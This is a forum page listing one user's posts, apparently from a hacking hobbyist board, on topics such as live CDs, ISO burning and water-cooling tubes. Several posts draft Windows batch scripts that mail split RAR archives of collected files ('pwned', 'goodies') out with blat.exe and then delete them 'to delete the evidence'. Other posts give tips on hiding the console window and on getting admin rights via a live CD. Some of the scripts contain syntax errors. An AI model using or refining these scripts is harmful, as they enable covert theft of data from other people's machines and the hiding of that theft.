Jump to content

SomeoneE1se

Dedicated Members
  • Posts

    2,800
  • Joined

  • Last visited

Posts posted by SomeoneE1se

  1. one of the best ways to learn is to dive in head first... I don't know everything about windows but that didn't stop me from burning an live ISO and trying it out... i didn't know anything but I had fun learning and expermenting... and if I did something to screw it up.... restart it's back to normal.... and I think he's smart enough not to delete anything or format anything so he'll be fine...

  2. I would sugest you do nothing.... this could be to update and just preventing down time.. i.e. if you do somthing and the admin comes in to turn on securty and finds you have messed around... bye bye all computer usage... I'd say wait a few days (even a weekend or two to be safe) if it's still like that after then you might want to do somthing LEGAL...

  3. it's been fixed 3 times... however if we start to send more then about 20 e-mails someone is going to catch that if not flagged as a spamer and that being a quick way to get an IP killed so keeping it to less then 100 would be the best idea...

    when I get home i'll test coopers batch script and edit it if need be

  4. IF EXIST pwned.rar GOTO 5end1
    
    IF EXIST pwned.r00 GOTO 5end1
    
    ELSE GOTO END
    
    
    
    :hak1
    
    set /a part=%part%+1
    
    IF %part% lss 10
    
    goto less10
    
    else goto more10
    
    
    
    :less10
    
    IF EXIST pwned.r0%part% goto sendless10
    
    else goto end
    
    :more10
    
    IF EXIST pwned.r%part% goto send
    
    else goto end
    
    
    
    :5end1
    
    blat.exe pwned.rar -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    del pwned.rar (delete the evidence after sending)
    
    goto hak1
    
    
    
    :sendless10
    
    blat.exe pwned.r0%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    del pwned.r%part% (delete the evidence after sending)
    
    goto hak1
    
    
    
    :send
    
    blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    del pwned.r%part% (delete the evidence after sending)
    
    goto hak1
    
    
    
    :end
    
    exit

    @ this point gmullens las small bit would prolly b better as its les line's of code ....

    (tho i dont kno the issue's ....)

    I think this bit of code will create an error becasue if the .rar does not exist when it sees the .r00 it will try to send *.rar and it not being there will gen the error.... spliting the send of .rar and the sending of .r00 should fix this

    I can't think right now I'm at work

  5. ...that and the fact you don't wanna turn the inside of your rig into a fish tank.

    Or do you? Imagine fish swimming around your cpu, an eel latched to your ram and a starfish chilling with your videocard. Sounds like a cool idea to me.

    I was going to say that would be the coolest mod i've seen.... I may have to try this when I move into the new house... I can get my friend to help me out he loves fish.

  6. Ok so I finshed my code I didn't go to 45 but sending 20 files should be enough and i also preped boristsr code but I have NO idea if it will work

    @ECHO OFF
    
    IF EXIST goodies.r00 GOTO hak0
    
    ELSE GOTO end
    
    :hak0
    
    blat.exe goodies.r00 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r01 GOTO hak1
    
    ELSE GOTO end
    
    :hak1
    
    blat.exe goodies.r01 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r02 GOTO hak2
    
    ELSE GOTO end
    
    :hak2
    
    blat.exe goodies.r02 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r03 GOTO hak3 
    
    ELSE GOTO end
    
    :hak3
    
    blat.exe goodies.r03 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r04 GOTO hak4
    
    ELSE GOTO end
    
    :hak4
    
    blat.exe goodies.r04 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r05 GOTO hak5
    
    ELSE GOTO end
    
    :hak5
    
    blat.exe goodies.r05 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r06 GOTO hak6
    
    ELSE GOTO end
    
    :hak6
    
    blat.exe goodies.r06 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r07 GOTO hak7
    
    ELSE GOTO end
    
    :hak7
    
    blat.exe goodies.r07 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r08 GOTO hak8
    
    ELSE GOTO end
    
    :hak8
    
    blat.exe goodies.r08 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r09 GOTO hak9
    
    ELSE GOTO end
    
    :hak9
    
    blat.exe goodies.r09 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r10 GOTO hak10
    
    ELSE GOTO end
    
    :hak10
    
    blat.exe goodies.r10 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r11 GOTO hak11
    
    ELSE GOTO end
    
    :hak11
    
    blat.exe goodies.r11 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r12 GOTO hak12
    
    ELSE GOTO end
    
    :hak12
    
    blat.exe goodies.r12 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r13 GOTO hak13
    
    ELSE GOTO end
    
    :hak13
    
    blat.exe goodies.r13 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r14 GOTO hak14
    
    ELSE GOTO end
    
    :hak14
    
    blat.exe goodies.r14 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r15 GOTO hak15
    
    ELSE GOTO end
    
    :hak15
    
    blat.exe goodies.r15 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r16 GOTO hak16
    
    ELSE GOTO end
    
    :hak16
    
    blat.exe goodies.r16 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r17 GOTO hak17
    
    ELSE GOTO end
    
    :hak17
    
    blat.exe goodies.r17 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r18 GOTO hak18
    
    ELSE GOTO end
    
    :hak18
    
    blat.exe goodies.r18 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    IF EXIST goodies.r19 GOTO hakover 
    
    ELSE GOTO end
    
    :hakover
    
    blat.exe goodies.r19 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    :end
    
    exit

    if you expect to have to send more then 20 files let me know and i'll update the code for more files

    and again I have noidea if this will work

    @echo off
    
    SET rarNum=00
    
    SET rar="goodies.r"
    
    SET rarfile=%rar%%rarNum%
    
    IF NOT EXIST %rarfile% GOTO end
    
    
    
    :hakit
    
    blat.exe %rarfile% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
    
    
    
    ::increment the file number
    
    SET /a rarNum=rarNum+1
    
    IF %rarNum% LSS 10 set rarNum=0%fileNum%
    
    SET rarfile=%rar%%rarNum%
    
    
    
    ::check to see if next file exists and then loop
    
    ::else continue on
    
    IF EXIST %rarfile% GOTO hakit
    
    
    
    :end
    
    exit

  7. Take a look at fastpush all that is, is just a batch script.... or anyother program.. the idea would be to chose the language to fit the program requirements here we need to pass commands to the windows command line... useing a batch script would be the best/fastest way... if not the simplest or smallest code.... it works thats all we need.

    and this way theres nothing else trying to hide on the computer...

  8. This is just a simple batch script

    it's been a long time but its somthing like

    IF EXIST pwned.r00 GOTO hak1 
    
    ELSE GOTO END
    
    :hak1
    
    pwn box more send e-mail 2   (replace with script to send e-mail I have no clue about those commands)
    
    IF EXIST pwned.r02 GOTO hak2 
    
    ELSE GOTO END
    
    :hak2
    
    pwn box more (same)
    
    IF EXIST pwned.r03 GOTO hak3
    
    ELSE GOTO end
    
    ...
    
    more haking code
    
    ...
    
    :end
    
    REM THIS BOX HAS BEEN PWNED BY HAK5.ORG

    someone should check that (that should be right but i'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5 I can't help but leave easter eggs in my code even if it's a script kiddie egg)

    and you may not want to add that last REMark

  9. somewhere on this forum someone kept saying somthing about renaming the bat to somthing like .cmd or command or somthing thats starts with a C and reminds me of the work command and if you do NO window will come up

    I remember hearing of this twice but I can't seem to find it anymore

  10. I like deepburner free personally, its easy: Just select the option for ISO burning when it starts, and find the ISO file on your desktop or wherever.

    its also free, hence the name deepburner free. Hasnt let me down.

    www.deepburner.com

    i like deepburner free i use to to handed my DVD .iso because the PowerToy i use for other iso's seems to choke on DVDs

  11. what is the fattest tube of the folowing ?

    Swiftech 1/2" outer dimension, 3/8" inner dimentions

    Swiftech 5/8" outer dimension, 7/16" inner dimentions

    and when u buy a cpu water block and it says its compatible with 3/8 does that go for the outer domensions or inner?

    thx guys hakgipc

    .... are you kidding me?

    8 + 8 = 16

    3 + 3 = 6 making the first 6/16 therefor smaller on the inside

    and if you cant figure out that 5/8" IS larger then 1/2" then you don't get to know...

    comeon this is third grade stuff

  12. I was hosting a FTP server with anon open to the world (don't ask why.. I know this is such a bad idea but I needed it for a while...) anyways one day when I checked the folder that was open to the world and a certain type of pr0n was sitting there and I read the file name and was quick to pop in a DBAN cd... I have no need/want to be answering question from the FBI

    Happen to look at your logs to see where it came from?

    it was a free and crappy ftp server I don't think the free version kept logs

  13. I'm shocked at all of you... and you call you selfs haklings here's what you do.. if you can burn a CD go find a nice small Live CD the smallest one at http://www.slax.org should work for this.. and reboot into slax and poof you're now an admin... use truecrypt it's the best

    if you can't burn a cd http://www.ubuntu.com have them send you a cd you can use it as a live CD and poof your admin again... use truecrypt it's l33t

  14. I was hosting a FTP server with anon open to the world (don't ask why.. I know this is such a bad idea but I needed it for a while...) anyways one day when I checked the folder that was open to the world and a certain type of pr0n was sitting there and I read the file name and was quick to pop in a DBAN cd... I have no need/want to be answering question from the FBI

  15. when i first browse the pandora webpage again (after haveing deleted everything on my driver (which includes cookies and browsing cache and everything)) it doesn't ask me for a login name nor a password. It directly loads my last session whith all my favorite artists.

    if you have formatted your c: drive, the situation u describe is impossible.

    impossible is nothing... to begin with

    if anyone does not believe me, just take the time and make your own conclusions and don't treat me as if I was dumb-stupid, I know what I say. At this point I believe the only way they ARE doing this is by grabbing (somehow with actionscript or maybe a hidden script on another web scripting languaje) some hardware unique id's, like the cpu one or the hard disk one, or maube a combination of both.

    by the way, I always zero all data when formatting.

    I DON'T BELIEVE YOU

    I was bored so I decided to test this out (I needed to format anyway) I made sure I was signed in to pandora in firefox and IE then I formated and reinstalled XP and it did not know who I was when I went back to pandora.. and the Same for Vista (Clean upgrade from 5600 to 5728) so I think you signed in or someone else signed in or you didn't format it at all. and if I wasent so lasy I'd open wireshark and CHECK EVERY packet sent to pandora servers...

  16. LMAO I know the feeling moonlit just let it go becasue you end up dead in your bath tub...

    (I wonder if anyone will get this rerence)

    I'm guessing it's either from Lewis Black or Fight Club.

    +1 to mad props I love Lewis Black

  17. if you REALLY REALLY REALLY don't want to format you can do this

    (press enter or return for each line)
    
    
    
    Start > Run > 'cmd' > OK
    
    
    
    cd Desktop
    
    
    
    copy con screwed.bat
    
    
    
    shutdown -a
    
    
    
    ctrl + Z

    Now when that window pops up just double click on the gear icon on the desktop that says screwed and it SHOULD go away

    BUT THIS IS JUST A QUICK FIX YOU SHOULD DO AS VAKO SAYS AND NUKE THE DRIVE.. FORMAT AND START OVER.... if there is really a virus it could be recording everything you do.. i.e. Credit Card info/SSNs could be sent to someone.

×
×
  • Create New...